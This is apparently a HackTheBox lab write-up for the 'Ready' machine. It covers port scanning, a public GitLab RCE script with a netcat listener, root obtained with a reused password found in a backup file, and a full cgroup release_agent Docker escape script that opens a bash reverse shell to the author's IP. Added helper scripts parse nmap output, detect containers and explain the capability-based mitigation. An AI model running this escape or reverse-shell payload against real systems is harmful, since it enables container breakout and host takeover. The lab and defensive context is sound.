[HtB] – Ready

Hey guys, I'm back with another easy HackTheBox box write-up (well, it's actually rated medium, but it was easy).

First, let's scan for open ports:

nmap -A -T4 -p- 10.10.10.220 | tee scan.txt

  • -A : enables OS detection (-O), version scanning (-sV), script scanning (-sC) and traceroute (--traceroute)
  • -p- : nmap scans every port
  • -T4 : allows you to adjust the Timing Template (according to your bandwidth, and the speed you're seeking)

The interesting thing to notice is that nothing is served on port 80, which is usually where you'd find the website. Instead, there is one hosted on port 5080.

Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-28 16:11 CET
Nmap scan report for ready.htb (10.10.10.220)
Host is up (0.016s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
5080/tcp open  http    nginx
| http-robots.txt: 53 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile 
| /dashboard /projects/new /groups/new /groups/*/edit /users /help 
|_/s/ /snippets/new /snippets/*/edit
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was http://ready.htb:5080/users/sign_in
|_http-trane-info: Problem with XML parsing of /evox/about
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.07 seconds
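When a scan like this feeds a larger engagement, it is worth having the port table in a structured form rather than eyeballing it. The following is an added example, not part of the original write-up: a small parser for nmap's normal output format that turns each port line and its NSE script output into a record, then answers the question raised above (which open ports speak HTTP?). The sample input is the scan output shown above, embedded so the script runs offline.

```python
import re
from typing import Dict, List

# Sample input: the port table from the scan above, embedded verbatim so the
# parser runs offline (nmap "normal" output, which the -A scan produces).
SAMPLE_SCAN = r"""Nmap scan report for ready.htb (10.10.10.220)
Host is up (0.016s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
5080/tcp open  http    nginx
| http-robots.txt: 53 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile 
| /dashboard /projects/new /groups/new /groups/*/edit /users /help 
|_/s/ /snippets/new /snippets/*/edit
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was http://ready.htb:5080/users/sign_in
|_http-trane-info: Problem with XML parsing of /evox/about
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
"""

# "22/tcp   open  ssh     OpenSSH 8.2p1 ..." -> port, proto, state, service, version
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
# "| http-title: ..." or "|_http-title: ..." -> NSE script name and first output line
SCRIPT_RE = re.compile(r"^\|_?\s*([A-Za-z][\w.-]*):\s*(.*)$")


def parse_nmap(text: str) -> List[Dict]:
    """Turn nmap normal output into a list of port records with their script output."""
    ports: List[Dict] = []
    current = None      # port record that the following "|" lines belong to
    last_script = None  # script name that continuation lines extend
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = {
                "port": int(m.group(1)),
                "proto": m.group(2),
                "state": m.group(3),
                "service": m.group(4),
                "version": (m.group(5) or "").strip(),
                "scripts": {},
            }
            ports.append(current)
            last_script = None
            continue
        if current is None or not line.startswith("|"):
            continue  # host banner, "Service Info", timing lines
        s = SCRIPT_RE.match(line)
        if s:
            last_script = s.group(1)
            current["scripts"][last_script] = s.group(2).strip()
        elif last_script:
            # continuation of a multi-line script result (host keys, robots entries)
            cont = line.lstrip("|_ ").rstrip()
            current["scripts"][last_script] = (current["scripts"][last_script] + "\n" + cont).strip()
    return ports


def open_ports(ports: List[Dict], service_prefix: str = "") -> List[int]:
    """Open ports whose detected service name starts with the prefix (e.g. "http")."""
    return [p["port"] for p in ports
            if p["state"] == "open" and p["service"].startswith(service_prefix)]


if __name__ == "__main__":
    scan = parse_nmap(SAMPLE_SCAN)
    for p in scan:
        print(p["port"], p["service"], p["version"], sorted(p["scripts"]))
    print("web ports:", open_ports(scan, "http"))
```

Run it against `tee scan.txt` output from any -A scan; the records are plain dicts, so they drop straight into JSON or a notes file. The parser only handles nmap's human-readable format; for anything more involved, nmap's own -oX XML output is the more robust source.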

You'll get the following login form. It will bring back some memories for some of you 😉

If you create an account and go to the help section, you'll learn which GitLab version is in use: 11.4.7. In some cases you'll also notice a little red label stating "update asap". That's a good clue 🙂

Foothold

After a bit of googling, I found this Python script that exploits a known CVE affecting this particular version.

┌─|Log_s [00:00] :~/Cyber/chall/machines/Ready 
└──╼ $ python3 gitlab_rce.py http://10.10.10.220:5080 10.10.14.239
Start a listener on port 42069 and hit enter (nc -vlnp 42069)

Start a listener in another terminal on port 42069 as prompted, and hit enter.

$ rlwrap nc -lvp 42069
listening on [any] 42069 ...
connect to [10.10.14.239] from ready.htb [10.10.10.220] 57814
bash: cannot set terminal process group (518): Inappropriate ioctl for device
bash: no job control in this shell
[email protected]:~/gitlab-rails/working$ 

That's our foothold.

Own User

You get the user flag straight away with cat /home/dude/user.txt (told you it wasn't hard).

Own Root

This part is a little trickier if you don't understand your environment. You will often find software like GitLab running in a Docker container; to be sure, you can simply run LinPEAS.sh or LinEnum.sh, which will tell you if they detect that they're being run inside Docker.
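For anyone curious what those enumeration scripts actually look at, here is an added example (my own, not code from the write-up or from LinPEAS/LinEnum) that applies the three usual checks: the /.dockerenv marker file, container paths in PID 1's cgroup file, and a root filesystem mounted as an overlay. The sample file contents are constructed, not captured from the box, and the cgroup check is written for the cgroup v1 layout; on a cgroup v2 host Docker containers show "0::/", so the overlay check is what catches them there.

```python
import os

# Constructed samples (not captured from the box): PID 1's cgroup file and the
# root-mount line of mountinfo as they typically look inside a Docker container
# on a cgroup v1 host, next to the same files on a plain Ubuntu host.
CGROUP_IN_DOCKER = (
    "12:rdma:/\n"
    "11:memory:/docker/<container-id-placeholder>\n"
    "1:name=systemd:/docker/<container-id-placeholder>\n"
)
MOUNTINFO_IN_DOCKER = (
    "538 418 0:51 / / rw,relatime - overlay overlay rw,lowerdir=/var/lib/docker/overlay2/l/A:"
    "/var/lib/docker/overlay2/l/B,upperdir=/var/lib/docker/overlay2/X/diff,workdir=/var/lib/docker/overlay2/X/work\n"
    "539 538 0:52 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw\n"
)
CGROUP_ON_HOST = "12:rdma:/\n11:memory:/user.slice/user-1000.slice\n1:name=systemd:/init.scope\n"
MOUNTINFO_ON_HOST = "24 1 8:1 / / rw,relatime - ext4 /dev/sda1 rw,errors=remount-ro\n"

# Substrings that only appear in a cgroup path when the process lives in a container
# (docker-<id>.scope is the systemd cgroup driver's naming).
CGROUP_MARKERS = ("/docker/", "docker-", "/kubepods", "/lxc/")


def root_fstype(mountinfo: str) -> str:
    """Filesystem type of the root mount ("/"), parsed from /proc/self/mountinfo.
    Format: id parent maj:min root mountpoint opts ... - fstype source superopts"""
    for line in mountinfo.splitlines():
        pre, sep, post = line.partition(" - ")
        fields = pre.split()
        if sep and len(fields) >= 5 and fields[4] == "/":
            return post.split()[0]
    return ""


def container_indicators(cgroup: str, mountinfo: str, dockerenv_present: bool) -> list:
    """Return a human-readable list of the indicators that fired (empty on a plain host)."""
    found = []
    if dockerenv_present:
        found.append("/.dockerenv exists")
    for line in cgroup.splitlines():
        path = line.split(":", 2)[-1]  # "11:memory:/docker/abc" -> "/docker/abc"
        if any(marker in path for marker in CGROUP_MARKERS):
            found.append(f"cgroup path {path!r}")
            break
    if root_fstype(mountinfo) == "overlay":
        found.append("root filesystem is an overlay mount")
    return found


def is_container(cgroup: str, mountinfo: str, dockerenv_present: bool) -> bool:
    return bool(container_indicators(cgroup, mountinfo, dockerenv_present))


def check_live() -> list:
    """Run the same checks against the real /proc files of the current system."""
    def read(path):
        try:
            with open(path) as f:
                return f.read()
        except OSError:
            return ""
    return container_indicators(read("/proc/1/cgroup"), read("/proc/self/mountinfo"),
                                os.path.exists("/.dockerenv"))


if __name__ == "__main__":
    for hint in check_live() or ["no container indicators found"]:
        print(hint)
```

None of these indicators is authoritative on its own (an image can delete /.dockerenv, and overlay root filesystems exist outside containers too), which is why the function reports every indicator that fired rather than a single verdict.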

I quickly found a way to escape a Docker container, provided the container is running as root and you're root inside it (which we currently aren't). So, with that cleared up, all we have to do is privesc to root in our current environment.

After some regular enumeration work, you'll find what you need in a backup file: cat /opt/backup/gitlab.rb | grep password

The admin reuses passwords (oooooh, bad boy), so this line is interesting:

gitlab_rails['smtp_password'] = "wW59U!ZKMbG9+*#h"

Let's upgrade to a proper shell and try to switch to root:

@gitlab:/home/dude$ python3 -c "import pty;pty.spawn('/bin/bash')"
python3 -c "import pty;pty.spawn('/bin/bash')"
[email protected]:/home/dude$ su root
su root
Password: wW59U!ZKMbG9+*#h

root@gitlab:/home/dude# id
id
uid=0(root) gid=0(root) groups=0(root)

The final step is to escape the Docker container. Here is a simple way that works here. Create the /tmp/cgrp folder, then create a bash script with the following content and run it (don't forget to replace my info with your own IP and port).

#! /bin/bash

mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
 
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent

#Reverse shell
echo '#!/bin/bash' > /cmd
echo "bash -i >& /dev/tcp/10.10.14.239/9999 0>&1" >> /cmd
chmod a+x /cmd

sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
head /output

Finally, listen on the right port and run the script!

$ rlwrap nc -lvp 9999
listening on [any] 9999 ...
connect to [10.10.14.239] from ready.htb [10.10.10.220] 59432
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
[email protected]:/# id
id
uid=0(root) gid=0(root) groups=0(root)

Now a simple cat /root/root.txt will do the trick.
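The escape above hinges on being allowed to mount a cgroup filesystem, and that mount needs CAP_SYS_ADMIN, a capability a plain docker run never hands out; it only appears in containers started with extra privileges such as --privileged. That makes the capability set the thing to check, whether you are auditing your own containers or confirming why a trick like this works. The following is an added example, not part of the write-up, that decodes the CapEff mask from /proc/self/status and reports what the container has beyond Docker's default set. The two status excerpts are constructed, not captured from the box: the first is the well-known default mask (00000000a80425fb), the second the full mask of a privileged container.

```python
import re
from typing import Set

# Linux capability names indexed by bit number (include/uapi/linux/capability.h).
CAP_NAMES = [
    "chown", "dac_override", "dac_read_search", "fowner", "fsetid", "kill",
    "setgid", "setuid", "setpcap", "linux_immutable", "net_bind_service",
    "net_broadcast", "net_admin", "net_raw", "ipc_lock", "ipc_owner",
    "sys_module", "sys_rawio", "sys_chroot", "sys_ptrace", "sys_pacct",
    "sys_admin", "sys_boot", "sys_nice", "sys_resource", "sys_time",
    "sys_tty_config", "mknod", "lease", "audit_write", "audit_control",
    "setfcap", "mac_override", "mac_admin", "syslog", "wake_alarm",
    "block_suspend", "audit_read",
]

# Constructed /proc/self/status excerpts (not captured from the box): the effective
# set of a root process in a default `docker run` container versus under --privileged.
STATUS_DEFAULT_DOCKER = "Name:\tbash\nCapInh:\t0000000000000000\nCapEff:\t00000000a80425fb\n"
STATUS_PRIVILEGED = "Name:\tbash\nCapInh:\t0000000000000000\nCapEff:\t0000003fffffffff\n"

# Docker's default bounding set as a mask (14 capabilities, no cap_sys_admin).
DOCKER_DEFAULT_MASK = 0x00000000A80425FB


def decode_caps(hexmask: str) -> Set[str]:
    """Expand a CapEff/CapPrm/CapBnd hex mask into capability names."""
    mask = int(hexmask, 16)
    return {f"cap_{CAP_NAMES[i]}" for i in range(len(CAP_NAMES)) if (mask >> i) & 1}


def cap_eff(status: str) -> str:
    """Pull the CapEff mask out of /proc/<pid>/status text."""
    m = re.search(r"^CapEff:\s*([0-9a-fA-F]+)$", status, re.MULTILINE)
    if not m:
        raise ValueError("no CapEff line in status text")
    return m.group(1)


def extra_caps(status: str) -> Set[str]:
    """Capabilities the process holds beyond Docker's default set."""
    return decode_caps(cap_eff(status)) - decode_caps(f"{DOCKER_DEFAULT_MASK:016x}")


def allows_cgroup_mount(status: str) -> bool:
    """mount(2) of a cgroup filesystem, as used by the release_agent trick above,
    needs cap_sys_admin in the effective set."""
    return "cap_sys_admin" in decode_caps(cap_eff(status))


if __name__ == "__main__":
    with open("/proc/self/status") as f:
        live = f.read()
    print("effective caps:", sorted(decode_caps(cap_eff(live))))
    print("beyond Docker default:", sorted(extra_caps(live)))
    print("cgroup mount possible:", allows_cgroup_mount(live))
```

Run inside any container to see its own effective set; an empty "beyond Docker default" line means the container was started without --privileged or --cap-add, and the mitigation for the escape shown here is exactly that: run GitLab (or anything else) without those flags, and drop capabilities further with --cap-drop where the workload allows it.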

I hope you enjoyed, and see you for another write-up 😉